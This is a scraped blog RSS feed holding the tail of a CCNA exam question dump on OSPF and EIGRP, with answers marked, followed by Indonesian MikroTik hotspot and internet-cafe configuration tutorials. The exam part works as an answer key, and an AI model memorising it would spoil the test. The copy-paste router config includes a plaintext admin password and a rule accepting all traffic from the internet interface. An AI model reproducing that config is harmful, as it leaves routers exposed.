43. Refer to the exhibit. Which two statements are true based on the exhibited output? (Choose two.)&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_nXUjvBK2YII/S5weGPzyTrI/AAAAAAAAAF8/LWdiJ1efX_A/s1600-h/43.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="182" src="http://1.bp.blogspot.com/_nXUjvBK2YII/S5weGPzyTrI/AAAAAAAAAF8/LWdiJ1efX_A/s400/43.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;Automatic summarization is disabled.&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;The EIGRP routing protocol is being used.&lt;/b&gt;&lt;/div&gt;There is one feasible successor in the routing table.&lt;br /&gt;
The serial interface S0/0/0 is administratively down.&lt;br /&gt;
The router is originating the route to 172.16.1.0/24 via the S0/0/0 interface&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
44. Refer to the exhibit. Two routers are unable to establish an adjacency. What is the possible cause for this?&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_nXUjvBK2YII/S5wefbpQZYI/AAAAAAAAAGA/Ms58gr-AQS8/s1600-h/44.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="227" src="http://3.bp.blogspot.com/_nXUjvBK2YII/S5wefbpQZYI/AAAAAAAAAGA/Ms58gr-AQS8/s400/44.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;The two routers are connected on a multiaccess network.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;The hello and dead intervals are different on the two routers.&lt;/b&gt;&lt;/div&gt;They have different OSPF router IDs.&lt;br /&gt;
They have different process IDs&lt;br /&gt;
&lt;br /&gt;
45. What command would the network administrator apply to a router that is running OSPF to advertise the entire range of addresses included in 172.16.0.0/19 in area 0?&lt;br /&gt;
R1(config-router)# network 172.16.0.0 0.0.0.255 area 0&lt;br /&gt;
R1(config-router)# network 172.16.0.0 0.0.3.255 area 0&lt;br /&gt;
R1(config-router)# network 172.16.0.0 0.0.15.255 area 0&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;R1(config-router)# network 172.16.0.0 0.0.31.255 area 0&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
46. What should be considered when troubleshooting a problem with the establishment of neighbor relationships between OSPF routers? (Choose two.)&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;OSPF interval timers mismatch&lt;/b&gt;&lt;/div&gt;administrative distance mismatch&lt;br /&gt;
&lt;div style="color: red;"&gt;interface network type mismatch&lt;/div&gt;no loopback interface configured&lt;br /&gt;
gateway of last resort not redistributed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
47. Which two components are used to determine the router ID in the configuration of the OSPF routing process? (Choose two.)&lt;br /&gt;
the IP address of the first FastEthernet interface&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;the highest IP address of any logical interface&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;the highest IP address of any physical interface&lt;/b&gt;&lt;/div&gt;the default gateway IP address&lt;br /&gt;
the priority value of 1 on any physical interface&lt;br /&gt;
&lt;br /&gt;
48. What is the function of the OSPF LSR packet?&lt;br /&gt;
It is used to confirm the receipt of LSUs.&lt;br /&gt;
It is used to establish and maintain adjacency with other OSPF routers.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;It is used by the receiving routers to request more information about any entry in the DBD.&lt;/b&gt;&lt;/div&gt;It is used to check the database synchronization between routers.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
49. Refer to the exhibit. All interfaces are configured with the correct IP addresses and subnet masks. OSPF has been configured as the routing protocol. During troubleshooting, it is determined that hosts on network B can ping the Lo0 interface on R1 but are unable to reach hosts on network A. What is the cause of the problem?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wfA6ROMvI/AAAAAAAAAGE/01EWJI0GwYk/s1600-h/49.jpg" imageanchor="1" style="color: #2255aa; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="293" src="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wfA6ROMvI/AAAAAAAAAGE/01EWJI0GwYk/s400/49.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Routers R1 and R2 have incorrect router IDs configured.&lt;br /&gt;
Router R1 is unable to form a neighbor relationship with router R2.&lt;br /&gt;
Routers R1 and R2 have been configured in different OSPF areas.&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;The configuration of router R1 fails to include network A in the OSPF routing process&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
50. Refer to the exhibit. The interface addresses and OSPF priorities are configured as shown. Because of the boot order of the routers, router A is currently the DR and router B is the BDR. If router A fails and is replaced the next day by a new router, router D, what OSPF protocol action or actions will happen?&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wfRlAZ_tI/AAAAAAAAAGI/2fMdkwcJc04/s1600-h/50.jpg" imageanchor="1" style="color: #7dae12; margin-left: 1em; margin-right: 1em; text-decoration: underline;"&gt;&lt;img border="0" height="227" src="http://2.bp.blogspot.com/_nXUjvBK2YII/S5wfRlAZ_tI/AAAAAAAAAGI/2fMdkwcJc04/s400/50.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;Router D will be elected DR, and router C will become the BDR.&lt;/b&gt;&lt;/div&gt;Router D will be elected DR, and router B will remain the BDR.&lt;br /&gt;
Router C will become the DR, and router B will become the BDR.&lt;br /&gt;
Router B will remain the BDR, and OSPF will function on the segment via the use of only the BDR&lt;/span&gt;&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-8850629412901436522?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-04-26T12:00:49.066+07:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/_nXUjvBK2YII/S5wUaqtUI8I/AAAAAAAAAEM/D4T_FjnqIFc/s72-c/4.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Hotspot Server Setup</title><link>http://vanzuearticles.blogspot.com/2010/04/hotspot-server-setup.html</link><category>Belajar JARKOM</category><category>Setting Mikrotik</category><author>vanzue@gmail.com</author><pubDate>Sat, 24 Apr 2010 17:00:58 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-3092082261086148966</guid><description>&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;b&gt;&lt;span style="font-size: 15.0pt;"&gt;Hotspot Server Setup&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;Setting Ethernet yang konek ke jaringan Internet misal:&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="PreformattedText"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.5pt; mso-bidi-font-family: &amp;quot;DejaVu Sans Mono&amp;quot;;"&gt;/ ip address add address=192.168.1.5/24 network=192.168.1.0 broadcast=192.168.1.255 interface=ether1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;Konfigurasi untuk interface yang konek ke jaringan local.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="PreformattedText"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.5pt; mso-bidi-font-family: &amp;quot;DejaVu Sans Mono&amp;quot;;"&gt;/ ip address add address=10.10.0.1/24 network=10.10.0.0 broadcast=10.10.0.255 interface=ether2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;Selanjutnya setting DNS nya kasih centang di "ALLOW REMOTE REQUEST" (konfigurasi ini melewatkan request dari client) sample :&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_JYCZNSWdoTU/S9ODpaRFclI/AAAAAAAAATE/UpRVyUFKnuc/s1600/untitled.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="436" src="http://4.bp.blogspot.com/_JYCZNSWdoTU/S9ODpaRFclI/AAAAAAAAATE/UpRVyUFKnuc/s640/untitled.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shapetype id="_x0000_t75" coordsize="21600,21600"
 o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
 stroked="f"&gt;  &lt;v:stroke joinstyle="miter"/&gt;  &lt;v:formulas&gt;   &lt;v:f eqn="if lineDrawn pixelLineWidth 0"/&gt;   &lt;v:f eqn="sum @0 1 0"/&gt;   &lt;v:f eqn="sum 0 0 @1"/&gt;   &lt;v:f eqn="prod @2 1 2"/&gt;   &lt;v:f eqn="prod @3 21600 pixelWidth"/&gt;   &lt;v:f eqn="prod @3 21600 pixelHeight"/&gt;   &lt;v:f eqn="sum @0 0 1"/&gt;   &lt;v:f eqn="prod @6 1 2"/&gt;   &lt;v:f eqn="prod @7 21600 pixelWidth"/&gt;   &lt;v:f eqn="sum @8 21600 0"/&gt;   &lt;v:f eqn="prod @7 21600 pixelHeight"/&gt;   &lt;v:f eqn="sum @10 21600 0"/&gt;  &lt;/v:formulas&gt;  &lt;v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/&gt;  &lt;o:lock v:ext="edit" aspectratio="t"/&gt; &lt;/v:shapetype&gt;&lt;v:shape id="_x0000_s1026" type="#_x0000_t75" style='position:absolute;
 margin-left:0;margin-top:0;width:473.2pt;height:324.7pt;z-index:251652608;
 mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal:center;
 mso-position-horizontal-relative:text;mso-position-vertical:absolute;
 mso-position-vertical-relative:text' filled="t"&gt;  &lt;v:fill color2="black"/&gt;  &lt;v:imagedata src="file:///C:\DOCUME~1\vanzue\LOCALS~1\Temp\msohtmlclip1\01\clip_image001.png"
  o:title=""/&gt;  &lt;w:wrap type="square" side="largest"/&gt; &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;Liat menu ROUTE dan langsung menuju TKP. Kilik tombol + . isikan ip gateway anda. Sample :&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_JYCZNSWdoTU/S9OD9bIm9II/AAAAAAAAATM/EhBbJRPxTXo/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="410" src="http://1.bp.blogspot.com/_JYCZNSWdoTU/S9OD9bIm9II/AAAAAAAAATM/EhBbJRPxTXo/s640/1.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id="_x0000_s1027" type="#_x0000_t75"
 style='position:absolute;margin-left:0;margin-top:0;width:498.55pt;height:318.45pt;
 z-index:251653632;mso-wrap-distance-left:0;mso-wrap-distance-right:0;
 mso-position-horizontal:center;mso-position-horizontal-relative:text;
 mso-position-vertical:absolute;mso-position-vertical-relative:text' filled="t"&gt;  &lt;v:fill color2="black"/&gt;  &lt;v:imagedata src="file:///C:\DOCUME~1\vanzue\LOCALS~1\Temp\msohtmlclip1\01\clip_image003.png"
  o:title=""/&gt;  &lt;w:wrap type="square" side="largest"/&gt; &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;Lompat aja ke IP&amp;gt;Hotspot klik Hospot setup.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id="_x0000_s1028" type="#_x0000_t75"
 style='position:absolute;margin-left:0;margin-top:0;width:498.55pt;height:281.85pt;
 z-index:251654656;mso-wrap-distance-left:0;mso-wrap-distance-right:0;
 mso-position-horizontal:center;mso-position-horizontal-relative:text;
 mso-position-vertical:absolute;mso-position-vertical-relative:text' filled="t"&gt;  &lt;v:fill color2="black"/&gt;  &lt;v:imagedata src="file:///C:\DOCUME~1\vanzue\LOCALS~1\Temp\msohtmlclip1\01\clip_image005.png"
  o:title=""/&gt;  &lt;w:wrap type="square" side="largest"/&gt; &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_JYCZNSWdoTU/S9OEPIFL4lI/AAAAAAAAATU/F0Bk5myJ6KU/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="362" src="http://1.bp.blogspot.com/_JYCZNSWdoTU/S9OEPIFL4lI/AAAAAAAAATU/F0Bk5myJ6KU/s640/2.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_JYCZNSWdoTU/S9OEapoOJGI/AAAAAAAAATc/nGBlL6wcBX0/s1600/3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="362" src="http://2.bp.blogspot.com/_JYCZNSWdoTU/S9OEapoOJGI/AAAAAAAAATc/nGBlL6wcBX0/s640/3.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_JYCZNSWdoTU/S9OEp7qBW3I/AAAAAAAAATk/Gp_eMuWqSSc/s1600/4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="362" src="http://2.bp.blogspot.com/_JYCZNSWdoTU/S9OEp7qBW3I/AAAAAAAAATk/Gp_eMuWqSSc/s640/4.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_JYCZNSWdoTU/S9OE0GEQ5II/AAAAAAAAATs/uDFLA9N4Bp8/s1600/5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="362" src="http://2.bp.blogspot.com/_JYCZNSWdoTU/S9OE0GEQ5II/AAAAAAAAATs/uDFLA9N4Bp8/s640/5.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id="_x0000_s1031" type="#_x0000_t75"
 style='position:absolute;margin-left:3.75pt;margin-top:1.35pt;width:495.4pt;
 height:303.7pt;z-index:251657728;mso-wrap-distance-left:0;
 mso-wrap-distance-right:0;mso-position-horizontal:absolute;
 mso-position-horizontal-relative:text;mso-position-vertical:absolute;
 mso-position-vertical-relative:text' filled="t"&gt;  &lt;v:fill color2="black"/&gt;  &lt;v:imagedata src="file:///C:\DOCUME~1\vanzue\LOCALS~1\Temp\msohtmlclip1\01\clip_image011.png"
  o:title=""/&gt;  &lt;w:wrap type="square" side="largest"/&gt; &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id="_x0000_s1032"
 type="#_x0000_t75" style='position:absolute;margin-left:5.25pt;margin-top:315.9pt;
 width:498.55pt;height:250.4pt;z-index:251658752;mso-wrap-distance-left:0;
 mso-wrap-distance-right:0;mso-position-horizontal:absolute;
 mso-position-horizontal-relative:text;mso-position-vertical:absolute;
 mso-position-vertical-relative:text' filled="t"&gt;  &lt;v:fill color2="black"/&gt;  &lt;v:imagedata src="file:///C:\DOCUME~1\vanzue\LOCALS~1\Temp\msohtmlclip1\01\clip_image013.png"
  o:title=""/&gt;  &lt;w:wrap type="square" side="largest"/&gt; &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_JYCZNSWdoTU/S9OFCGwvfCI/AAAAAAAAAT0/6nCAfPFSUck/s1600/6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="362" src="http://1.bp.blogspot.com/_JYCZNSWdoTU/S9OFCGwvfCI/AAAAAAAAAT0/6nCAfPFSUck/s640/6.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_JYCZNSWdoTU/S9OFNmttvuI/AAAAAAAAAT8/bTbwcjoHrZs/s1600/7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="362" src="http://1.bp.blogspot.com/_JYCZNSWdoTU/S9OFNmttvuI/AAAAAAAAAT8/bTbwcjoHrZs/s640/7.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_JYCZNSWdoTU/S9OFa5wiHcI/AAAAAAAAAUE/pDoQbA5nK_Q/s1600/8.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="362" src="http://3.bp.blogspot.com/_JYCZNSWdoTU/S9OFa5wiHcI/AAAAAAAAAUE/pDoQbA5nK_Q/s640/8.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;o:p&gt;&lt;br /&gt;
&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id="_x0000_s1035" type="#_x0000_t75"
 style='position:absolute;margin-left:0;margin-top:0;width:498.55pt;height:318.7pt;
 z-index:251661824;mso-wrap-distance-left:0;mso-wrap-distance-right:0;
 mso-position-horizontal:center;mso-position-horizontal-relative:text;
 mso-position-vertical:absolute;mso-position-vertical-relative:text' filled="t"&gt;  &lt;v:fill color2="black"/&gt;  &lt;v:imagedata src="file:///C:\DOCUME~1\vanzue\LOCALS~1\Temp\msohtmlclip1\01\clip_image019.png"
  o:title=""/&gt;  &lt;w:wrap type="square" side="largest"/&gt; &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id="_x0000_s1036" type="#_x0000_t75"
 style='position:absolute;margin-left:0;margin-top:0;width:498.55pt;height:266.7pt;
 z-index:251662848;mso-wrap-distance-left:0;mso-wrap-distance-right:0;
 mso-position-horizontal:center;mso-position-horizontal-relative:text;
 mso-position-vertical:absolute;mso-position-vertical-relative:text' filled="t"&gt;  &lt;v:fill color2="black"/&gt;  &lt;v:imagedata src="file:///C:\DOCUME~1\vanzue\LOCALS~1\Temp\msohtmlclip1\01\clip_image021.png"
  o:title=""/&gt;  &lt;w:wrap type="square" side="largest"/&gt; &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_JYCZNSWdoTU/S9OFmlOpEiI/AAAAAAAAAUM/VSggvjXgjRc/s1600/9.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="410" src="http://1.bp.blogspot.com/_JYCZNSWdoTU/S9OFmlOpEiI/AAAAAAAAAUM/VSggvjXgjRc/s640/9.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_JYCZNSWdoTU/S9OFxvnsjGI/AAAAAAAAAUU/cVJj41vzGZ0/s1600/10.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="410" src="http://4.bp.blogspot.com/_JYCZNSWdoTU/S9OFxvnsjGI/AAAAAAAAAUU/cVJj41vzGZ0/s640/10.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-3092082261086148966?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-04-25T07:00:58.921+07:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/_JYCZNSWdoTU/S9ODpaRFclI/AAAAAAAAATE/UpRVyUFKnuc/s72-c/untitled.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Setting mikrotik untuk warnet</title><link>http://vanzuearticles.blogspot.com/2010/04/setting-mikrotik-untuk-warnet.html</link><category>Setting Mikrotik</category><author>vanzue@gmail.com</author><pubDate>Sat, 24 Apr 2010 16:39:55 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-2948323159931063913</guid><description>&lt;div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span lang="IN" style="font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ansi-language: IN; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: IN;"&gt;Setting mikrotik untuk warnet &lt;/span&gt;&lt;/b&gt;&lt;span lang="IN" style="font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ansi-language: IN; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: IN;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;"&gt;&lt;span lang="IN" style="font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ansi-language: IN; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: IN;"&gt;mikrotik untuk warnet&lt;br /&gt;
&lt;br /&gt;
ini konfigurasi bagi teman-teman yang mungkin agak kesulitan setting mikrotik.&lt;br /&gt;
tinggal di copy trus paste aja di terminal. jadi deh .&lt;br /&gt;
&lt;br /&gt;
step-step&lt;br /&gt;
&lt;br /&gt;
instal pake cd mikrotik &lt;br /&gt;
boot dg cd mikrotik &lt;br /&gt;
setelah bisa boot pake iso linux, pilih beberapa paket yang dibutuhkan. (kalo bingung centang aja semua) &lt;br /&gt;
ikuti aja langkahnya tekan (Yes) (Yes)&lt;br /&gt;
setelah restart, login : admin pass : (kosong)&lt;br /&gt;
trus copy paste aja tulisan berikut ; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DASAR_______________&lt;br /&gt;
system identity set name=warnet.beenet&lt;br /&gt;
user set admin password=sukasukalu &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ethernet____________________&lt;br /&gt;
interface ethernet enable ether1&lt;br /&gt;
interface ethernet enable ether2&lt;br /&gt;
interface Ethernet set ether1 name=intranet&lt;br /&gt;
interface Ethernet set ether2 name=internet &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
IP ADDRESS_______________&lt;br /&gt;
ip address add interface=internet address=XXXXX (dari ISP)&lt;br /&gt;
ip address add interface=intranet address=192.168.0.1/24 &lt;br /&gt;
&lt;br /&gt;
route_______________&lt;br /&gt;
ip route add gateway=XXXXX (dari ISP) &lt;br /&gt;
&lt;br /&gt;
dns___________&lt;br /&gt;
ip dns set primary-dns=XXXXX (dari ISP) 2 secondary-dns=XXXXX (dari ISP) &lt;br /&gt;
&lt;br /&gt;
nat &amp;amp; filter firewall standar_______________&lt;br /&gt;
ip firewall nat add action=masquerade chain=srcnat&lt;br /&gt;
ip firewall filter add chain=input connection-state=invalid action=drop&lt;br /&gt;
ip firewall filter add chain=input protocol=udp action=accept&lt;br /&gt;
ip firewall filter add chain=input protocol=icmp action=accept&lt;br /&gt;
ip firewall filter add chain=input in-interface=intranet action=accept&lt;br /&gt;
ip firewall filter add chain=input in-interface=internet action=accept &lt;br /&gt;
&lt;br /&gt;
dhcp server______________________________________&lt;br /&gt;
ip dhcp-server setup&lt;br /&gt;
dhcp server interface: intranet&lt;br /&gt;
dhcp address space: 192.168.0.0/24&lt;br /&gt;
gateway for dhcp network: 192.168.0.1&lt;br /&gt;
addresses to give out: 192.168.0.2-192.168.0.254&lt;br /&gt;
dns servers: XXXXX (dari ISP),XXXXX (dari ISP)&lt;br /&gt;
lease time: 3d &lt;br /&gt;
&lt;br /&gt;
web proxy_________________________&lt;br /&gt;
ip web-proxy&lt;br /&gt;
set enabled=yes&lt;br /&gt;
set src-address=0.0.0.0&lt;br /&gt;
set port=8080set hostname=proxy-apaaja&lt;br /&gt;
set transparent-proxy=yesset parent-proxy=0.0.0.0:0&lt;br /&gt;
set cache-administrator=silahkan.pannggil.operator&lt;br /&gt;
set max-object-size=4096KiB&lt;br /&gt;
set cache-drive=system&lt;br /&gt;
set max-cache-size=unlimited&lt;br /&gt;
set max-ram-cache-size=unlimited &lt;br /&gt;
&lt;br /&gt;
bikinredirect port ke transparant proxy__________________________&lt;br /&gt;
/ip firewall nat add chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=8080&lt;br /&gt;
/ip firewall nat add chain=dstnat protocol=tcp dst-port=3128 action=redirect to-ports=8080&lt;br /&gt;
/ip firewall nat add chain=dstnat protocol=tcp dst-port=8080 action=redirect to-ports=8080 &lt;br /&gt;
&lt;br /&gt;
PCQ ________________________&lt;br /&gt;
/ip firewall mangle add chain=forward src-address=192.168.169.0/28 action=mark-connection new-connection-mark=client1-cm&lt;br /&gt;
/ip firewall mangle add connection-mark=client1-cm action=mark-packet new-packet-mark=client1-pm chain=forward&lt;br /&gt;
/queue type add name=downsteam-pcq kind=pcq pcq-classifier=dst-address&lt;br /&gt;
/queue type add name=upstream-pcq kind=pcq pcq-classifier=src-address&lt;br /&gt;
/queue tree add parent=intranet queue=downsteam-pcq packet-mark=client1-pm&lt;br /&gt;
/queue tree add parent=internet queue=upstream-pcq packet-mark=client1-pm &lt;br /&gt;
&lt;br /&gt;
simpel queue______________________________&lt;br /&gt;
queue simple add name=kbu-01 target-addresses=192.168.0.11&lt;br /&gt;
